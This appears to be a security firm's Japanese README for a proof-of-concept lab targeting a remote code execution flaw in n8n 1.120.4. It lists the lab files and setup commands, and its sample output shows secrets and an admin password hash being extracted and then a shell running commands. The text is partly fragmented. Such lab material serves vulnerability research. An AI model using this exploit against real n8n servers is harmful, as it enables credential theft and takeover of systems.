
Ni8mare、n8n リモートコード実行
n8n 1.120.4 のForm Triggerワークフローとエクスプロイトスクリプトを用いたPoC環境。
Dockerfile — n8n脆弱環境を構築run.bat — コンテナを実行 (Windows)workflow.txt — n8nワークフロー (Form Triggerを含む)poc.py — PoCスクリプトrequirements.txt — PoCの依存関係docker build -t n8n-vuln:1.120.4 .
run.bat
workflow.txtを貼り付けpip3 install -r requirements.txt
python3 poc.py
FINAL_SECRET_KEY、管理者識別子)を抽出します。n8n-shell>)が表示されます。id)を実行すると、対象環境からの出力が返されます(RCE)。[+] Success: SECRET_KEY = "..."
[+] Success: admin_id = "..."
[+] Success: admin_hash = "..."
=== n8n Shell Ready ===
n8n-shell> id
[!] 'id' Result:
------------------------------
uid=1000(n8n) gid=1000(n8n) groups=1000(n8n)
------------------------------
当社は毎月1回、CVEとマルウェア分析を公開しています。ご興味がございましたら、以下のリンクから出版物をご覧ください。